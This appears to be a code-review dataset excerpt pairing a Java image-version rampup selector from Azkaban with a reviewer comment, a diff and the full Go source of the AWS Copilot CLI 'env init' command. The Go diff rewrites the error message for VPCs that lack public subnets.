remainingImageTypes = new TreeSet<>(); final Map<String, ImageVersionMetadata> imageTypeVersionMap = this.processAndGetVersionForImageTypes(flow, imageTypes, imageTypeRampups, remainingImageTypes); // Throw exception if there are left over image types if (!remainingImageTypes.isEmpty()) { throw new ImageMgmtException("Could not fetch version for below image types. Reasons: " + " 1. There is no active rampup plan in the image_rampup_plan table. 2. There is no " + " active version in the image_versions table. 
Image Types: " + remainingImageTypes); } return this.createVersionInfoMap(imageTypeVersionMap); } @Override public VersionInfo getVersionInfo(final String imageType, final String imageVersion, final Set<State> stateFilter) throws ImageMgmtException { final Optional<ImageVersion> optionalImageVersion = this .fetchImageVersion(imageType, imageVersion); // If state filter is null or empty return the version info directly. // If state filter is present, apply the filter and return version info if (optionalImageVersion.isPresent() && ((stateFilter.isEmpty() || stateFilter == null) || stateFilter.contains(optionalImageVersion.get().getState()))) { return new VersionInfo(optionalImageVersion.get().getVersion(), optionalImageVersion.get().getPath(), optionalImageVersion.get().getState()); } else { throw new ImageMgmtException(String.format("Unable to get VersionInfo for image type: %s, " + "image version: %s with NEW or ACTIVE state.", imageType, imageVersion)); } } /** * This method processes image type rampup details for the image type and selects a version for * the image type. Here is the version selection process for an image type 1. Sort the ramp up * data in the ascending order of rampup percentage. 2. Generate a random number between 1 to 100 * both inclusive. Let us say the number the number generated is 60. 3. Let us say there are three * versions 1.1.1, 1.1.2 & and 1.1.3 with rampup percantages 10, 30 & 60 respectively. 4. The * above percentage fors three ranges [1 - 10], [11 - 40] & [41 - 100]. The random humber 60 * belongs to the last range i.e. [41 - 100] and hence version 1.1.3 will be selected. If random * number generated is 22 then version 1.1.2 will be selected and so on. 5. If there is no active * rampup plan for an image type or in the active plan if the version is marked unstable or * deprecated, and latest active version will be selected from the image_verions table. 6. If * there is no active version in the image_versions table, it will throw appropriate error message * mentioning could not select version for the image type and the whole process would fail. 7. * Follow the rampup procedure to elect a new version from the image_versions table for the ailed * image type. * * @param imageTypes - set of specified image types * @param imageTypeRampups - contains rampup list for an image type * @param remainingImageTypes - This set is used to keep track of the image types for which * version metadata is not available. 
* @return Map<String, VersionMetadata> */ private Map<String, ImageVersionMetadata> processAndGetVersionForImageTypes( final ExecutableFlow flow, final Set<String> imageTypes, final Map<String, List<ImageRampup>> imageTypeRampups, final Set<String> remainingImageTypes) { final Set<String> imageTypeSet = imageTypeRampups.keySet(); log.info("Found active rampup for the image types {} ", imageTypeSet); final Map<String, ImageVersionMetadata> imageTypeVersionMap = new TreeMap<>( String.CASE_INSENSITIVE_ORDER); final Map<String, ImageVersion> imageTypeRampupVersionMap = this.processAndGetRampupVersion(flow, imageTypeRampups); imageTypeRampupVersionMap .forEach((k, v) -> imageTypeVersionMap.put(k, new ImageVersionMetadata(v, imageTypeRampups.get(k), MSG_RANDOM_RAMPUP_VERSION_SELECTION))); log.info("After processing rampup records -> imageTypeVersionMap: {}", imageTypeVersionMap); /* * Fetching the latest active image version from image_versions table for the remaining image * types for which there is no active rampup plan or the versions are marked as * unstable/deprecated in the active plan. */ // Converts the input image types to lowercase for case insensitive comparison. final Set<String> imageTypesInLowerCase = imageTypes.stream().map(String::toLowerCase).collect(Collectors.toSet()); remainingImageTypes.addAll(imageTypesInLowerCase); remainingImageTypes .removeAll(imageTypeVersionMap.keySet().stream().map(String::toLowerCase).collect( Collectors.toSet())); log.info("After finding version through rampup image types remaining: {} ", remainingImageTypes); final Map<String, ImageVersion> imageTypeActiveVersionMap = this.processAndGetActiveImageVersion(remainingImageTypes); imageTypeActiveVersionMap .forEach((k, v) -> imageTypeVersionMap.put(k, new ImageVersionMetadata(v, MSG_ACTIVE_VERSION_SELECTION))); log.info("After fetching active image version -> imageTypeVersionMap {}", imageTypeVersionMap); // For the leftover image types throw exception with appropriate error message. remainingImageTypes .removeAll(imageTypeVersionMap.keySet().stream().map(String::toLowerCase).collect( Collectors.toSet())); log.info("After fetching version using ramp up and based on active image version the " + "image types remaining: {} ", remainingImageTypes); return imageTypeVersionMap; } /** * Method to process the rampup list and get the rampup version based on rampup logic for * the given image types in the rampup map. 
* * @param imageTypeRampups * @return Map<String, ImageVersion> */ private Map<String, ImageVersion> processAndGetRampupVersion( final ExecutableFlow flow, final Map<String, List<ImageRampup>> imageTypeRampups) { final Set<String> imageTypeSet = imageTypeRampups.keySet(); log.info("Found active rampup for the image types {} ", imageTypeSet); final Map<String, ImageVersion> imageTypeRampupVersionMap = new TreeMap<>(String.CASE_INSENSITIVE_ORDER); if (imageTypeSet.isEmpty()) { log.warn("No active rampup found for the image types"); return imageTypeRampupVersionMap; } log.info("Found active rampup for the image types {} ", imageTypeSet); for (final String imageTypeName : imageTypeSet) { final List<ImageRampup> imageRampupList = imageTypeRampups.get(imageTypeName); if (imageRampupList.isEmpty()) { log.info("ImageRampupList was empty, so continue"); continue; } if (null == flow) { log.info("Flow object is null, so continue"); final ImageRampup firstImageRampup = imageRampupList.get(0); imageTypeRampupVersionMap.put(imageTypeName, this.fetchImageVersion(imageTypeName, firstImageRampup.getImageVersion()) .orElseThrow(() -> new ImageMgmtException( String.format("Unable to fetch version %s from image " + "versions table.", firstImageRampup.getImageVersion())))); continue; } int prevRampupPercentage = 0; final int flowNameHashValMapping = ContainerImplUtils.getFlowNameHashValMapping(flow); log.info("HashValMapping: " + flowNameHashValMapping); for (final ImageRampup imageRampup : imageRampupList) { final int rampupPercentage = imageRampup.getRampupPercentage(); if (flowNameHashValMapping >= prevRampupPercentage + 1 && flowNameHashValMapping <= prevRampupPercentage + rampupPercentage) { imageTypeRampupVersionMap.put(imageTypeName, this.fetchImageVersion(imageTypeName, imageRampup.getImageVersion()) .orElseThrow(() -> new ImageMgmtException( String.format("Unable to fetch version %s from image " + "versions table.", imageRampup.getImageVersion())))); log.debug("The image version {} is selected for image type {} with rampup percentage {}", imageRampup.getImageVersion(), imageTypeName, rampupPercentage); break; } log.info("ImageTypeRampupVersionMap: " + imageTypeRampupVersionMap); prevRampupPercentage += rampupPercentage; } } return imageTypeRampupVersionMap; } /** * Process and get latest active image version for the given image types. * * @param imageTypes * @return Map<String, ImageVersion> */ private Map<String, ImageVersion> processAndGetActiveImageVersion(final Set<String> imageTypes) { final Map<String, ImageVersion> imageTypeActiveVersionMap = new TreeMap<>(String.CASE_INSENSITIVE_ORDER); if (!CollectionUtils.isEmpty(imageTypes)) { final List<ImageVersion> imageVersions = this.imageVersionDao.getActiveVersionByImageTypes(imageTypes); log.debug("Active image versions fetched: {} ", imageVersions); if (imageVersions != null && !imageVersions.isEmpty()) { for (final ImageVersion imageVersion : imageVersions) { imageTypeActiveVersionMap.put(imageVersion.getName(), imageVersion); } } } return imageTypeActiveVersionMap; } /** * Get latest non active image version for the given image types. 
* * @param imageTypes * @return Map<String, ImageVersion> */ private Map<String, ImageVersion> getLatestNonActiveImageVersion(final Set<String> imageTypes) { final Map<String, ImageVersion> imageTypeLatestNonActiveVersionMap = new TreeMap<>(String.CASE_INSENSITIVE_ORDER); if (!CollectionUtils.isEmpty(imageTypes)) { final List<ImageVersion> imageVersions = this.imageVersionDao.getLatestNonActiveVersionByImageTypes(imageTypes); log.info("Non Active image versions fetched: {} ", imageVersions); if (imageVersions != null && !imageVersions.isEmpty()) { for (final ImageVersion imageVersion : imageVersions) { imageTypeLatestNonActiveVersionMap.put(imageVersion.getName(), imageVersion); } // Retain the the remaining/left over image types (i.e. image types without any version) imageTypes.removeAll(imageTypeLatestNonActiveVersionMap.keySet().stream() .map(String::toLowerCase) .collect(Collectors.toSet())); } } return imageTypeLatestNonActiveVersionMap; } /** * Method to fetch image version based on image type and image version. * * @param imageType * @param imageVersion * @return Optional<ImageVersion> */ private Optional<ImageVersion> fetchImageVersion(final String imageType, final String imageVersion) { final ImageMetadataRequest imageMetadataRequest = ImageMetadataRequest.newBuilder() .addParam(ImageMgmtConstants.IMAGE_TYPE, imageType) .addParam(ImageMgmtConstants.IMAGE_VERSION, imageVersion) .build(); final List<ImageVersion> imageVersions = this.imageVersionDao .findImageVersions(imageMetadataRequest); if (CollectionUtils.isEmpty(imageVersions)) { return Optional.empty(); } // Return only the imageVersion only when the image type/name matches for (final ImageVersion version : imageVersions) { if (version.getName().equalsIgnoreCase(imageType) && version.getVersion() .equalsIgnoreCase(imageVersion)) { return Optional.of(version); } } return Optional.empty(); } /** * Creates VersionInfo map from the ImageVersionMetadata map for the given image type keys. * * @param imageVersionMetadataMap * @return Map<String, VersionInfo> */ private Map<String, VersionInfo> createVersionInfoMap( final Map<String, ImageVersionMetadata> imageVersionMetadataMap) { final Map<String, VersionInfo> versionInfoMap = new TreeMap<>(String.CASE_INSENSITIVE_ORDER); imageVersionMetadataMap.forEach((k, v) -> versionInfoMap.put(k, new VersionInfo(v.getImageVersion().getVersion(), v.getImageVersion().getPath(), v.getImageVersion().getState()))); return versionInfoMap; } /** * Return rampup percentage comparator * * @return Comparator<ImageRampup> */ private Comparator<ImageRampup> getRampupPercentageComparator() { return Comparator.comparingInt(ImageRampup::getRampupPercentage); } }
1
22332
I thought we decided on using the latest active version, not the one with the maximum rampup percentage.
azkaban-azkaban
java
@@ -461,10 +461,13 @@ https://aws.amazon.com/premiumsupport/knowledge-center/ecs-pull-container-api-er if err != nil { if err == selector.ErrSubnetsNotFound { log.Errorf(`No existing public subnets were found in VPC %s. You can either: -- Create new public subnets and then import them. -- Use the default Copilot environment configuration.`, o.importVPC.ID) +- %s to interrupt, create new public subnets, then rerun %s and import them. +- %s to interrupt, then rerun %s and use the default Copilot environment configuration. +- Proceed without public subnets, knowing that deploying a load-balanced web service in this environment will fail because Load Balancers require at least two public subnets in different Availability Zones. +`, o.importVPC.ID, color.HighlightUserInput("ctrl-c"), color.HighlightCode("copilot env init"), color.HighlightUserInput("ctrl-c"), color.HighlightCode("copilot env init")) + } else { + return fmt.Errorf("select public subnets: %w", err) } - return fmt.Errorf("select public subnets: %w", err) } o.importVPC.PublicSubnetIDs = publicSubnets }
1
// Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. // SPDX-License-Identifier: Apache-2.0 package cli import ( "errors" "fmt" "net" "os" "strings" "github.com/aws/aws-sdk-go/aws" "github.com/aws/aws-sdk-go/aws/session" "github.com/aws/copilot-cli/internal/pkg/aws/cloudformation" "github.com/aws/copilot-cli/internal/pkg/aws/ec2" "github.com/aws/copilot-cli/internal/pkg/aws/iam" "github.com/aws/copilot-cli/internal/pkg/aws/identity" "github.com/aws/copilot-cli/internal/pkg/aws/profile" "github.com/aws/copilot-cli/internal/pkg/aws/s3" "github.com/aws/copilot-cli/internal/pkg/aws/sessions" "github.com/aws/copilot-cli/internal/pkg/config" "github.com/aws/copilot-cli/internal/pkg/deploy" deploycfn "github.com/aws/copilot-cli/internal/pkg/deploy/cloudformation" "github.com/aws/copilot-cli/internal/pkg/deploy/cloudformation/stack" "github.com/aws/copilot-cli/internal/pkg/template" "github.com/aws/copilot-cli/internal/pkg/term/color" "github.com/aws/copilot-cli/internal/pkg/term/log" termprogress "github.com/aws/copilot-cli/internal/pkg/term/progress" "github.com/aws/copilot-cli/internal/pkg/term/prompt" "github.com/aws/copilot-cli/internal/pkg/term/selector" "github.com/spf13/cobra" "github.com/spf13/pflag" ) const ( envInitAppNameHelpPrompt = "An environment will be created in the selected application." envInitNamePrompt = "What is your environment's name?" envInitNameHelpPrompt = "A unique identifier for an environment (e.g. dev, test, prod)." envInitDefaultEnvConfirmPrompt = `Would you like to use the default configuration for a new environment? - A new VPC with 2 AZs, 2 public subnets and 2 private subnets - A new ECS Cluster - New IAM Roles to manage services and jobs in your environment ` envInitVPCSelectPrompt = "Which VPC would you like to use?" envInitPublicSubnetsSelectPrompt = "Which public subnets would you like to use?" envInitPrivateSubnetsSelectPrompt = "Which private subnets would you like to use?" envInitVPCCIDRPrompt = "What VPC CIDR would you like to use?" envInitVPCCIDRPromptHelp = "CIDR used for your VPC. For example: 10.1.0.0/16" envInitPublicCIDRPrompt = "What CIDR would you like to use for your public subnets?" envInitPublicCIDRPromptHelp = "CIDRs used for your public subnets. For example: 10.1.0.0/24,10.1.1.0/24" envInitPrivateCIDRPrompt = "What CIDR would you like to use for your private subnets?" envInitPrivateCIDRPromptHelp = "CIDRs used for your private subnets. For example: 10.1.2.0/24,10.1.3.0/24" fmtEnvInitCredsPrompt = "Which credentials would you like to use to create %s?" envInitCredsHelpPrompt = `The credentials are used to create your environment in an AWS account and region. To learn more: https://aws.github.io/copilot-cli/docs/credentials/#environment-credentials` envInitRegionPrompt = "Which region?" envInitDefaultRegionOption = "us-west-2" fmtDNSDelegationStart = "Sharing DNS permissions for this application to account %s." fmtDNSDelegationFailed = "Failed to grant DNS permissions to account %s.\n\n" fmtDNSDelegationComplete = "Shared DNS permissions for this application to account %s.\n\n" fmtAddEnvToAppStart = "Linking account %s and region %s to application %s." fmtAddEnvToAppFailed = "Failed to link account %s and region %s to application %s.\n\n" fmtAddEnvToAppComplete = "Linked account %s and region %s to application %s.\n\n" ) var ( envInitAppNamePrompt = fmt.Sprintf("In which %s would you like to create the environment?", color.Emphasize("application")) envInitDefaultConfigSelectOption = "Yes, use default." 
envInitAdjustEnvResourcesSelectOption = "Yes, but I'd like configure the default resources (CIDR ranges)." envInitImportEnvResourcesSelectOption = "No, I'd like to import existing resources (VPC, subnets)." envInitCustomizedEnvTypes = []string{envInitDefaultConfigSelectOption, envInitAdjustEnvResourcesSelectOption, envInitImportEnvResourcesSelectOption} ) type importVPCVars struct { ID string PublicSubnetIDs []string PrivateSubnetIDs []string } func (v importVPCVars) isSet() bool { if v.ID != "" { return true } return len(v.PublicSubnetIDs) > 0 || len(v.PrivateSubnetIDs) > 0 } type adjustVPCVars struct { CIDR net.IPNet PublicSubnetCIDRs []string PrivateSubnetCIDRs []string } func (v adjustVPCVars) isSet() bool { if v.CIDR.String() != emptyIPNet.String() { return true } return len(v.PublicSubnetCIDRs) != 0 || len(v.PrivateSubnetCIDRs) != 0 } type tempCredsVars struct { AccessKeyID string SecretAccessKey string SessionToken string } func (v tempCredsVars) isSet() bool { return v.AccessKeyID != "" && v.SecretAccessKey != "" } type initEnvVars struct { appName string name string // Name for the environment. profile string // The named profile to use for credential retrieval. Mutually exclusive with tempCreds. isProduction bool // True means retain resources even after deletion. defaultConfig bool // True means using default environment configuration. importVPC importVPCVars // Existing VPC resources to use instead of creating new ones. adjustVPC adjustVPCVars // Configure parameters for VPC resources generated while initializing an environment. tempCreds tempCredsVars // Temporary credentials to initialize the environment. Mutually exclusive with the profile. region string // The region to create the environment in. } type initEnvOpts struct { initEnvVars // Interfaces to interact with dependencies. sessProvider sessionProvider store store envDeployer deployer appDeployer deployer identity identityService envIdentity identityService ec2Client ec2Client iam roleManager cfn stackExistChecker prog progress prompt prompter selVPC ec2Selector selCreds credsSelector selApp appSelector appCFN appResourcesGetter newS3 func(string) (zipAndUploader, error) uploader customResourcesUploader sess *session.Session // Session pointing to environment's AWS account and region. } func newInitEnvOpts(vars initEnvVars) (*initEnvOpts, error) { store, err := config.NewStore() if err != nil { return nil, err } sessProvider := sessions.NewProvider() defaultSession, err := sessProvider.Default() if err != nil { return nil, err } cfg, err := profile.NewConfig() if err != nil { return nil, fmt.Errorf("read named profiles: %w", err) } prompter := prompt.New() return &initEnvOpts{ initEnvVars: vars, sessProvider: sessProvider, store: store, appDeployer: deploycfn.New(defaultSession), identity: identity.New(defaultSession), prog: termprogress.NewSpinner(log.DiagnosticWriter), prompt: prompter, selCreds: &selector.CredsSelect{ Session: sessProvider, Profile: cfg, Prompt: prompter, }, selApp: selector.NewSelect(prompt.New(), store), uploader: template.New(), appCFN: deploycfn.New(defaultSession), newS3: func(region string) (zipAndUploader, error) { sess, err := sessProvider.DefaultWithRegion(region) if err != nil { return nil, err } return s3.New(sess), nil }, }, nil } // Validate returns an error if the values passed by flags are invalid. 
func (o *initEnvOpts) Validate() error { if o.name != "" { if err := validateEnvironmentName(o.name); err != nil { return err } } if err := o.validateCustomizedResources(); err != nil { return err } return o.validateCredentials() } // Ask asks for fields that are required but not passed in. func (o *initEnvOpts) Ask() error { if err := o.askAppName(); err != nil { return err } if err := o.askEnvName(); err != nil { return err } if err := o.askEnvSession(); err != nil { return err } if err := o.askEnvRegion(); err != nil { return err } return o.askCustomizedResources() } // Execute deploys a new environment with CloudFormation and adds it to SSM. func (o *initEnvOpts) Execute() error { o.initRuntimeClients() app, err := o.store.GetApplication(o.appName) if err != nil { // Ensure the app actually exists before we do a deployment. return err } envCaller, err := o.envIdentity.Get() if err != nil { return fmt.Errorf("get identity: %w", err) } if app.RequiresDNSDelegation() { if err := o.delegateDNSFromApp(app, envCaller.Account); err != nil { return fmt.Errorf("granting DNS permissions: %w", err) } } // 1. Attempt to create the service linked role if it doesn't exist. // If the call fails because the role already exists, nothing to do. // If the call fails because the user doesn't have permissions, then the role must be created outside of Copilot. _ = o.iam.CreateECSServiceLinkedRole() // 2. Add the stack set instance to the app stackset. if err := o.addToStackset(&deploycfn.AddEnvToAppOpts{ App: app, EnvName: o.name, EnvRegion: aws.StringValue(o.sess.Config.Region), EnvAccountID: envCaller.Account, }); err != nil { return err } // 3. Upload environment custom resource scripts to the S3 bucket, because of the 4096 characters limit (see // https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-lambda-function-code.html#cfn-lambda-function-code-zipfile) envRegion := aws.StringValue(o.sess.Config.Region) resources, err := o.appCFN.GetAppResourcesByRegion(app, envRegion) if err != nil { return fmt.Errorf("get app resources: %w", err) } s3Client, err := o.newS3(envRegion) if err != nil { return err } urls, err := o.uploader.UploadEnvironmentCustomResources(s3.CompressAndUploadFunc(func(key string, objects ...s3.NamedBinary) (string, error) { return s3Client.ZipAndUpload(resources.S3Bucket, key, objects...) })) if err != nil { return fmt.Errorf("upload custom resources to bucket %s: %w", resources.S3Bucket, err) } // 4. Start creating the CloudFormation stack for the environment. if err := o.deployEnv(app, urls); err != nil { return err } // 5. Get the environment env, err := o.envDeployer.GetEnvironment(o.appName, o.name) if err != nil { return fmt.Errorf("get environment struct for %s: %w", o.name, err) } env.Prod = o.isProduction env.CustomConfig = config.NewCustomizeEnv(o.importVPCConfig(), o.adjustVPCConfig()) // 6. Store the environment in SSM. if err := o.store.CreateEnvironment(env); err != nil { return fmt.Errorf("store environment: %w", err) } log.Successf("Created environment %s in region %s under application %s.\n", color.HighlightUserInput(env.Name), color.Emphasize(env.Region), color.HighlightUserInput(env.App)) return nil } // RecommendedActions returns follow-up actions the user can take after successfully executing the command. func (o *initEnvOpts) RecommendedActions() []string { return nil } func (o *initEnvOpts) initRuntimeClients() { // Initialize environment clients if not set. 
if o.envIdentity == nil { o.envIdentity = identity.New(o.sess) } if o.envDeployer == nil { o.envDeployer = deploycfn.New(o.sess) } if o.cfn == nil { o.cfn = cloudformation.New(o.sess) } if o.iam == nil { o.iam = iam.New(o.sess) } } func (o *initEnvOpts) validateCustomizedResources() error { if o.importVPC.isSet() && o.adjustVPC.isSet() { return errors.New("cannot specify both import vpc flags and configure vpc flags") } if (o.importVPC.isSet() || o.adjustVPC.isSet()) && o.defaultConfig { return fmt.Errorf("cannot import or configure vpc if --%s is set", defaultConfigFlag) } return nil } func (o *initEnvOpts) askAppName() error { if o.appName != "" { return nil } app, err := o.selApp.Application(envInitAppNamePrompt, envInitAppNameHelpPrompt) if err != nil { return fmt.Errorf("ask for application: %w", err) } o.appName = app return nil } func (o *initEnvOpts) askEnvName() error { if o.name != "" { return nil } envName, err := o.prompt.Get(envInitNamePrompt, envInitNameHelpPrompt, validateEnvironmentName) if err != nil { return fmt.Errorf("get environment name: %w", err) } o.name = envName return nil } func (o *initEnvOpts) askEnvSession() error { if o.profile != "" { sess, err := o.sessProvider.FromProfile(o.profile) if err != nil { return fmt.Errorf("create session from profile %s: %w", o.profile, err) } o.sess = sess return nil } if o.tempCreds.isSet() { sess, err := o.sessProvider.FromStaticCreds(o.tempCreds.AccessKeyID, o.tempCreds.SecretAccessKey, o.tempCreds.SessionToken) if err != nil { return err } o.sess = sess return nil } sess, err := o.selCreds.Creds(fmt.Sprintf(fmtEnvInitCredsPrompt, color.HighlightUserInput(o.name)), envInitCredsHelpPrompt) if err != nil { return fmt.Errorf("select creds: %w", err) } o.sess = sess return nil } func (o *initEnvOpts) askEnvRegion() error { region := aws.StringValue(o.sess.Config.Region) if o.region != "" { region = o.region } if region == "" { v, err := o.prompt.Get(envInitRegionPrompt, "", nil, prompt.WithDefaultInput(envInitDefaultRegionOption)) if err != nil { return fmt.Errorf("get environment region: %w", err) } region = v } o.sess.Config.Region = aws.String(region) return nil } func (o *initEnvOpts) askCustomizedResources() error { if o.defaultConfig { return nil } if o.importVPC.isSet() { return o.askImportResources() } if o.adjustVPC.isSet() { return o.askAdjustResources() } adjustOrImport, err := o.prompt.SelectOne( envInitDefaultEnvConfirmPrompt, "", envInitCustomizedEnvTypes) if err != nil { return fmt.Errorf("select adjusting or importing resources: %w", err) } switch adjustOrImport { case envInitImportEnvResourcesSelectOption: return o.askImportResources() case envInitAdjustEnvResourcesSelectOption: return o.askAdjustResources() case envInitDefaultConfigSelectOption: return nil } return nil } func (o *initEnvOpts) askImportResources() error { if o.selVPC == nil { o.selVPC = selector.NewEC2Select(o.prompt, ec2.New(o.sess)) } if o.importVPC.ID == "" { vpcID, err := o.selVPC.VPC(envInitVPCSelectPrompt, "") if err != nil { if err == selector.ErrVPCNotFound { log.Errorf(`No existing VPCs were found. You can either: - Create a new VPC first and then import it. - Use the default Copilot environment configuration. 
`) } return fmt.Errorf("select VPC: %w", err) } o.importVPC.ID = vpcID } if o.ec2Client == nil { o.ec2Client = ec2.New(o.sess) } dnsSupport, err := o.ec2Client.HasDNSSupport(o.importVPC.ID) if err != nil { return fmt.Errorf("check if VPC %s has DNS support enabled: %w", o.importVPC.ID, err) } if !dnsSupport { log.Errorln(`Looks like you're creating an environment using a VPC with DNS support *disabled*. Copilot cannot create services or jobs in VPCs without DNS support. We recommend enabling this property. To learn more about the issue: https://aws.amazon.com/premiumsupport/knowledge-center/ecs-pull-container-api-error-ecr/`) return fmt.Errorf("VPC %s has no DNS support enabled", o.importVPC.ID) } if o.importVPC.PublicSubnetIDs == nil { publicSubnets, err := o.selVPC.PublicSubnets(envInitPublicSubnetsSelectPrompt, "", o.importVPC.ID) if err != nil { if err == selector.ErrSubnetsNotFound { log.Errorf(`No existing public subnets were found in VPC %s. You can either: - Create new public subnets and then import them. - Use the default Copilot environment configuration.`, o.importVPC.ID) } return fmt.Errorf("select public subnets: %w", err) } o.importVPC.PublicSubnetIDs = publicSubnets } if o.importVPC.PrivateSubnetIDs == nil { privateSubnets, err := o.selVPC.PrivateSubnets(envInitPrivateSubnetsSelectPrompt, "", o.importVPC.ID) if err != nil { if err == selector.ErrSubnetsNotFound { log.Errorf(`No existing private subnets were found in VPC %s. You can either: - Create new private subnets and then import them. - Use the default Copilot environment configuration.`, o.importVPC.ID) } return fmt.Errorf("select private subnets: %w", err) } o.importVPC.PrivateSubnetIDs = privateSubnets } return nil } func (o *initEnvOpts) askAdjustResources() error { if o.adjustVPC.CIDR.String() == emptyIPNet.String() { vpcCIDRString, err := o.prompt.Get(envInitVPCCIDRPrompt, envInitVPCCIDRPromptHelp, validateCIDR, prompt.WithDefaultInput(stack.DefaultVPCCIDR)) if err != nil { return fmt.Errorf("get VPC CIDR: %w", err) } _, vpcCIDR, err := net.ParseCIDR(vpcCIDRString) if err != nil { return fmt.Errorf("parse VPC CIDR: %w", err) } o.adjustVPC.CIDR = *vpcCIDR } if o.adjustVPC.PublicSubnetCIDRs == nil { publicCIDR, err := o.prompt.Get(envInitPublicCIDRPrompt, envInitPublicCIDRPromptHelp, validateCIDRSlice, prompt.WithDefaultInput(stack.DefaultPublicSubnetCIDRs)) if err != nil { return fmt.Errorf("get public subnet CIDRs: %w", err) } o.adjustVPC.PublicSubnetCIDRs = strings.Split(publicCIDR, ",") } if o.adjustVPC.PrivateSubnetCIDRs == nil { privateCIDR, err := o.prompt.Get(envInitPrivateCIDRPrompt, envInitPrivateCIDRPromptHelp, validateCIDRSlice, prompt.WithDefaultInput(stack.DefaultPrivateSubnetCIDRs)) if err != nil { return fmt.Errorf("get private subnet CIDRs: %w", err) } o.adjustVPC.PrivateSubnetCIDRs = strings.Split(privateCIDR, ",") } return nil } func (o *initEnvOpts) importVPCConfig() *config.ImportVPC { if o.defaultConfig || !o.importVPC.isSet() { return nil } return &config.ImportVPC{ ID: o.importVPC.ID, PrivateSubnetIDs: o.importVPC.PrivateSubnetIDs, PublicSubnetIDs: o.importVPC.PublicSubnetIDs, } } func (o *initEnvOpts) adjustVPCConfig() *config.AdjustVPC { if o.defaultConfig || !o.adjustVPC.isSet() { return nil } return &config.AdjustVPC{ CIDR: o.adjustVPC.CIDR.String(), PrivateSubnetCIDRs: o.adjustVPC.PrivateSubnetCIDRs, PublicSubnetCIDRs: o.adjustVPC.PublicSubnetCIDRs, } } func (o *initEnvOpts) deployEnv(app *config.Application, customResourcesURLs map[string]string) error { caller, err := o.identity.Get() 
if err != nil { return fmt.Errorf("get identity: %w", err) } deployEnvInput := &deploy.CreateEnvironmentInput{ Name: o.name, AppName: o.appName, Prod: o.isProduction, ToolsAccountPrincipalARN: caller.RootUserARN, AppDNSName: app.Domain, AdditionalTags: app.Tags, CustomResourcesURLs: customResourcesURLs, AdjustVPCConfig: o.adjustVPCConfig(), ImportVPCConfig: o.importVPCConfig(), Version: deploy.LatestEnvTemplateVersion, } if err := o.cleanUpDanglingRoles(o.appName, o.name); err != nil { return err } if err := o.envDeployer.DeployAndRenderEnvironment(os.Stderr, deployEnvInput); err != nil { var existsErr *cloudformation.ErrStackAlreadyExists if errors.As(err, &existsErr) { // Do nothing if the stack already exists. return nil } // The stack failed to create due to an unexpect reason. // Delete the retained roles created part of the stack. o.tryDeletingEnvRoles(o.appName, o.name) return err } return nil } func (o *initEnvOpts) addToStackset(opts *deploycfn.AddEnvToAppOpts) error { o.prog.Start(fmt.Sprintf(fmtAddEnvToAppStart, color.Emphasize(opts.EnvAccountID), color.Emphasize(opts.EnvRegion), color.HighlightUserInput(o.appName))) if err := o.appDeployer.AddEnvToApp(opts); err != nil { o.prog.Stop(log.Serrorf(fmtAddEnvToAppFailed, color.Emphasize(opts.EnvAccountID), color.Emphasize(opts.EnvRegion), color.HighlightUserInput(o.appName))) return fmt.Errorf("deploy env %s to application %s: %w", opts.EnvName, opts.App.Name, err) } o.prog.Stop(log.Ssuccessf(fmtAddEnvToAppComplete, color.Emphasize(opts.EnvAccountID), color.Emphasize(opts.EnvRegion), color.HighlightUserInput(o.appName))) return nil } func (o *initEnvOpts) delegateDNSFromApp(app *config.Application, accountID string) error { // By default, our DNS Delegation permits same account delegation. if accountID == app.AccountID { return nil } o.prog.Start(fmt.Sprintf(fmtDNSDelegationStart, color.HighlightUserInput(accountID))) if err := o.appDeployer.DelegateDNSPermissions(app, accountID); err != nil { o.prog.Stop(log.Serrorf(fmtDNSDelegationFailed, color.HighlightUserInput(accountID))) return err } o.prog.Stop(log.Ssuccessf(fmtDNSDelegationComplete, color.HighlightUserInput(accountID))) return nil } func (o *initEnvOpts) validateCredentials() error { if o.profile != "" && o.tempCreds.AccessKeyID != "" { return fmt.Errorf("cannot specify both --%s and --%s", profileFlag, accessKeyIDFlag) } if o.profile != "" && o.tempCreds.SecretAccessKey != "" { return fmt.Errorf("cannot specify both --%s and --%s", profileFlag, secretAccessKeyFlag) } if o.profile != "" && o.tempCreds.SessionToken != "" { return fmt.Errorf("cannot specify both --%s and --%s", profileFlag, sessionTokenFlag) } return nil } // cleanUpDanglingRoles deletes any IAM roles created for the same app and env that were left over from a previous // environment creation. func (o *initEnvOpts) cleanUpDanglingRoles(app, env string) error { exists, err := o.cfn.Exists(stack.NameForEnv(app, env)) if err != nil { return fmt.Errorf("check if stack %s exists: %w", stack.NameForEnv(app, env), err) } if exists { return nil } // There is no environment stack. Either the customer ran "env delete" before, or it's their // first time running this command. // We should clean up any IAM roles that were *not* deleted during "env delete" // before re-creating the stack otherwise the deployment will fail. o.tryDeletingEnvRoles(app, env) return nil } // tryDeletingEnvRoles attempts a best effort deletion of IAM roles created from an environment. 
// To ensure that the roles being deleted were created by Copilot, we check if the copilot-environment tag // is applied to the role. func (o *initEnvOpts) tryDeletingEnvRoles(app, env string) { roleNames := []string{ fmt.Sprintf("%s-CFNExecutionRole", stack.NameForEnv(app, env)), fmt.Sprintf("%s-EnvManagerRole", stack.NameForEnv(app, env)), } for _, roleName := range roleNames { tags, err := o.iam.ListRoleTags(roleName) if err != nil { continue } if _, hasTag := tags[deploy.EnvTagKey]; !hasTag { continue } _ = o.iam.DeleteRole(roleName) } } // buildEnvInitCmd builds the command for adding an environment. func buildEnvInitCmd() *cobra.Command { vars := initEnvVars{} cmd := &cobra.Command{ Use: "init", Short: "Creates a new environment in your application.", Example: ` Creates a test environment in your "default" AWS profile using default configuration. /code $ copilot env init --name test --profile default --default-config Creates a prod-iad environment using your "prod-admin" AWS profile. /code $ copilot env init --name prod-iad --profile prod-admin --prod Creates an environment with imported VPC resources. /code $ copilot env init --import-vpc-id vpc-099c32d2b98cdcf47 \ /code --import-public-subnets subnet-013e8b691862966cf,subnet -014661ebb7ab8681a \ /code --import-private-subnets subnet-055fafef48fb3c547,subnet-00c9e76f288363e7f Creates an environment with overrided CIDRs. /code $ copilot env init --override-vpc-cidr 10.1.0.0/16 \ /code --override-public-cidrs 10.1.0.0/24,10.1.1.0/24 \ /code --override-private-cidrs 10.1.2.0/24,10.1.3.0/24`, RunE: runCmdE(func(cmd *cobra.Command, args []string) error { opts, err := newInitEnvOpts(vars) if err != nil { return err } if err := opts.Validate(); err != nil { return err } if err := opts.Ask(); err != nil { return err } 